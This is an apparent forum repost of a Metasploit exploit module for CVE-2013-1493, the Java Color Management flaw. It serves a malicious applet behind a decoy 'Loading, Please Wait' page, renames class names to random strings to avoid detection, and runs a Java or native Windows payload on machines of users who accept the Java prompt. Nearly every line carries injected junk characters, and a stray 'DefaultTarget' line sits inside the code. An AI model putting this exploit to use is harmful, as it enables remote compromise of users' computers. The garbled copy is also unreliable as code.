##% K5 K( O3 A2 B& G6 c+ D1 T: c" _4 `) }
8 }- X! ^1 |) T9 M$ @/ P
# This file is part of the Metasploit Framework and may be subject to! C) ~( u/ V+ \3 A
# redistribution and commercial restrictions. Please see the Metasploit
2 G, ]. L) t3 j Z2 ?# web site for more information on licensing and terms of use.
~5 c s W# f7 \# http://metasploit.com/
; J* c/ {$ ~$ D+ u7 O8 i% [##
2 p9 ]! k6 \- z; j+ F" o* srequire ‘msf/core’; [% ~( p; |* U" K- H" ]
require ‘rex’9 w: B* |8 |4 ?/ K9 a
class Metasploit3 < Msf::Exploit::Remote
2 w% `1 J1 W8 l9 p) F' XRank = NormalRanking" v1 f8 j( m( ~9 V
include Msf::Exploit::Remote::HttpServer::HTML( R, T6 t7 d) Z5 G- Z
include Msf::Exploit::EXE
- e- \7 C5 p$ y. F# s! Linclude Msf::Exploit::Remote::BrowserAutopwn
8 n% Z0 C: B% f2 F0 Z4 Aautopwn_info({ :javascript => false })/ \1 X: @ n5 Y/ j( c* W
def initialize( info = {} ), x5 L3 l7 I* O+ n/ S! [; ?
super( update_info( info,
; j9 A1 P! i1 e' _( N‘Name’ => ‘Java CMM Remote Code Execution’," m; d; J, g& ~& N- a" r- q
‘Description’ => %q{
7 e# F1 E5 y, NThis module abuses the Color Management classes from a Java Applet to run( \3 D1 e# a$ x+ v7 s3 |; u3 t6 i6 k
arbitrary Java code outside of the sandbox as exploited in the wild in February
8 p, d L& {4 ]and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u412 Q( w# z+ l; n% K, n7 V
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1$ y& H0 B0 K0 ^, @2 F' L
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java% a3 r3 w# T& B) ?& V0 l# O- P; z% b: b
warning in order to run the malicious applet.' ]+ A1 r6 Y( @# O$ b
},4 Q# n. l# j% v r6 U6 S
‘License’ => MSF_LICENSE,
, J; V+ O; q( m( H, m9 ?; Y‘Author’ =>8 [; U2 z9 ^ k0 ?/ x5 J
'Unknown', # Vulnerability discovery and Exploit/ i( Y1 r3 U8 a' w1 j
'juan vazquez' # Metasploit module (just ported the published exploit)
3 y. y* H4 Z2 ]0 i5 Y! ^! I],$ @5 E8 e1 f+ Y$ J. e
‘References’ =>
V' c/ Q: ~1 z7 g% t5 T% z" |[
: H, G+ _8 V$ @* c6 e" y$ h[ 'CVE', '2013-1493' ],4 \9 {+ G0 F& V2 p" J' q0 j& }
[ 'OSVDB', '90737' ],
1 S1 f: {2 y/ l d3 n1 o) m[ 'BID', '58238' ],$ J: u+ z9 e) F x& F" S5 k4 X
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
0 G! l3 e5 ?! e/ Z6 |* H# V[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
& X) m9 Q+ I+ Q5 v( ~[ 'URL', 'http://pastie.org/pastes/6581034' ]. b! F! Q l- s0 C3 u- w, E
],
5 a7 O3 i6 W; s‘Platform’ => [ 'win', 'java' ],$ C+ L2 j2 J8 e
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
( Q2 x6 c$ y4 y+ K6 o% ~7 ?‘Targets’ =>
; {) b# S& g: L[4 R. a! U: `* C8 h8 B
[ 'Generic (Java Payload)',* n3 Q9 g; V1 g. t) j
{' D' r+ k1 K* ^& F: t5 ~- s
'Platform' => 'java',2 c, ~/ l& Y( \7 b' b/ t
'Arch' => ARCH_JAVA
$ o- K& R ~* r! j8 m6 \/ n- Q}0 J1 l m1 L7 ~! p Y7 D9 T
],' C5 \ R& ~& w* K
[ 'Windows x86 (Native Payload)',& k1 \1 {8 {/ c Y" u# E& S
{2 f/ o' q4 @, p% Y. S. x7 t
'Platform' => 'win',0 D0 n* A- x8 A- @5 j3 J C
'Arch' => ARCH_X86
/ n, Y/ Y/ a2 }8 P( ~/ l}7 B } K, b5 k8 {/ H
]
% j3 Q2 C8 E$ P],6 J9 u u6 P* U
‘‘DisclosureDate’ => ‘Mar 01 2013′
7 ]0 ]9 u4 |2 z' E))
8 C/ w$ R' v9 P+ S8 ~end( M7 T' R: e2 O6 g0 p! V- B
def setup
: k7 ?7 W4 H( y( Opath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
' @$ n% O: {1 m6 V. m" t; _, q@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }1 n7 ^) J/ n7 v3 |; v+ H/ m9 B# k
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)7 L/ [6 y8 p' \6 Z Y
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }6 c' c6 Z! P, V/ L- e) e7 X+ i
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
* j* }' }/ J6 \8 c@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }7 E* X2 x7 T9 x7 `# g3 O. h4 `, m
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
% e {8 { {+ Z2 H. u5 D) D: a% m. x@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }. O2 l4 f: @9 D- U! k5 x" G Z% R
@init_class_name = rand_text_alpha(“Init”.length)
( V7 M2 c9 G. @% I+ ^* @+ p3 Z+ D2 [@init_class.gsub!(“Init”, @init_class_name). A5 b& f( t3 ]; _- s* G2 K4 Y
super' c% G% M' `" W6 U& i
end
; q8 i2 t- H% D' l+ rdef on_request_uri(cli, request)* r- v: J7 |( |5 m: O3 p4 ]
print_status(“handling request for #{request.uri}”)
7 y3 k2 @ q7 D. p" H1 ^8 ]& ?case request.uri' O+ i1 B/ R0 g
when /\.jar$/i
3 k: a8 d. G, Q7 [! {jar = payload.encoded_jar
, e% t5 U2 L5 v7 I4 Ljar.add_file(“#{@init_class_name}.class”, @init_class)
2 @/ U) }: c7 t9 O# ?0 P3 Wjar.add_file(“Leak.class”, @leak_class)5 m0 ^ W* L3 w4 S
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
7 A& b! X r) X# K7 C( d3 fjar.add_file(“MyColorSpace.class”, @color_space_class)
* `% X% G& I0 V7 G7 FDefaultTarget’ => 1,8 p& Y6 B& ]" l% W
metasploit_str = rand_text_alpha(“metasploit”.length)
- ~, g# T0 h% s+ S( K0 q1 Tpayload_str = rand_text_alpha(“payload”.length)( ]6 l4 H* C3 {# J/ ~- V7 H4 R
jar.entries.each { |entry|
: C' [! w h; |, x1 g1 nentry.name.gsub!(“metasploit”, metasploit_str)) e; j! M/ g/ P% v7 U/ f
entry.name.gsub!(“Payload”, payload_str)$ L% z4 D. C H+ B2 Z; j+ C
entry.data = entry.data.gsub(“metasploit”, metasploit_str)/ P5 G- ^" a; G: O' J
entry.data = entry.data.gsub(“Payload”, payload_str)2 w- S; r% i$ N$ j
}
& Z4 E' x: y& h, q* [: Ljar.build_manifest& Q4 e# W. l* T$ N1 p* G
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })6 ^9 R' `. [5 t3 Z" j6 T
when /\/$/
" m% L0 h5 r0 Y; f. U0 t# dpayload = regenerate_payload(cli)
! Y+ J( ^4 _" n/ Y7 hif not payload
# z2 s7 `6 s }& N- t# S _print_error(“Failed to generate the payload.”)/ b% d/ ~- T* D0 k% A7 b: ]& q
send_not_found(cli)# [5 c1 u" n" H; q
return
) T) X& s' ?" q1 z6 dend: P3 R6 }* a! T$ x+ v" d, w7 h+ [/ u
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })$ z3 _' n1 y0 p0 Z* N5 O9 t
else8 ?# A g1 W- l
send_redirect(cli, get_resource() + ‘/’, ”): M- H+ }2 E0 e. w' Z/ Z9 Y
end' G5 \/ L" t/ P; v h
end. `& y) A" a% v
def generate_html- A$ w5 }! u/ w3 D- S# i o6 C
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
6 P6 p- Y, ]. E# u/ f6 u* v) [& e- }html += %Q|<body><center><p>Loading, Please Wait…</p></center>|* G+ q9 k I( z7 |) m7 ]- f
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
n0 }& c* z( vhtml += %Q|</applet></body></html>|
# @; I1 A ?1 ?3 N( e/ j0 Rreturn html
% j5 U+ z% ]+ {8 l$ [) C: Cend
- T% k) B7 G7 Hend2 G) Y' v! }& g6 Z. c
end* A& ~) q5 L' |
|
发表于 2013-4-4 17:31:17
收藏
支持
反对